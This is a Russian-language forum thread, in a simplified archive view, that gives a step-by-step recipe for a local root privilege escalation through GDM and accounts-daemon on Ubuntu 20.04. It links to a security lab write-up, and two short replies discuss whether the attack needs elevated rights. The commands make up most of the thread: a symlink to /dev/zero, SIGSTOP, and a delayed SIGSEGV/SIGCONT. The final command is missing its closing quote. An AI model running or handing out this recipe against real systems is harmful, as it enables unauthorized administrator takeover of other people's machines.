/bin/dev - IT Lounge

Полная версия: Уязвимость в GDM, позволяющая получить права администратора
Вы просматриваете упрощённую версию нашего контента. Просмотр полной версии с полным форматированием.
В Ubuntu 20.04 в GDM обнаружена уязвимость, позволяющая получить привилегии root.

Алгоритм получения

Создайте симлинк:
Код:
ln -s /dev/zero .pam_environment
Попробуйте в настройках открыть параметры языка и региона. Диалоговое окно должно зависнуть. На этом этапе процесс accounts-daemon может потреблять 100% процессора (или одного ядра).

Удалите симлинк:
Код:
rm .pam_environment

Узнайте PID и отправьте сигнал SIGSTOP процессу accounts-daemon:

Код:
kill -SIGSTOP 597

Установите таймер и выйдите из текущей учётной записи:
Код:
nohup bash -c "sleep 30s; kill -SIGSEGV 597; kill -SIGCONT 597

Если всё прошло успешно - появится окно с предложением создать новую учётную запись, которая будет являться администратором.

https://securitylab.github.com/research/...ervice-LPE
(11.11.2020 09:Nov)ozz Написал: [ -> ]Узнайте PID и отправьте сигнал SIGSTOP процессу accounts-daemon

Так он же вроде запускается не от текущего пользователя, а то ли от собственного пользователя GDM, то ли от root/daemon. То есть чтобы получить повышенные права, нужны повышенные права… но так и без плясок с бубном можно. Или я не прав?
(11.11.2020 10:Nov)mord0d Написал: [ -> ]
(11.11.2020 09:Nov)ozz Написал: [ -> ]Узнайте PID и отправьте сигнал SIGSTOP процессу accounts-daemon


Так он же вроде запускается не от текущего пользователя, а то ли от собственного пользователя GDM, то ли от root/daemon. То есть чтобы получить повышенные права, нужны повышенные права… но так и без плясок с бубном можно. Или я не прав?

Дело вроде как в кривом симлинке.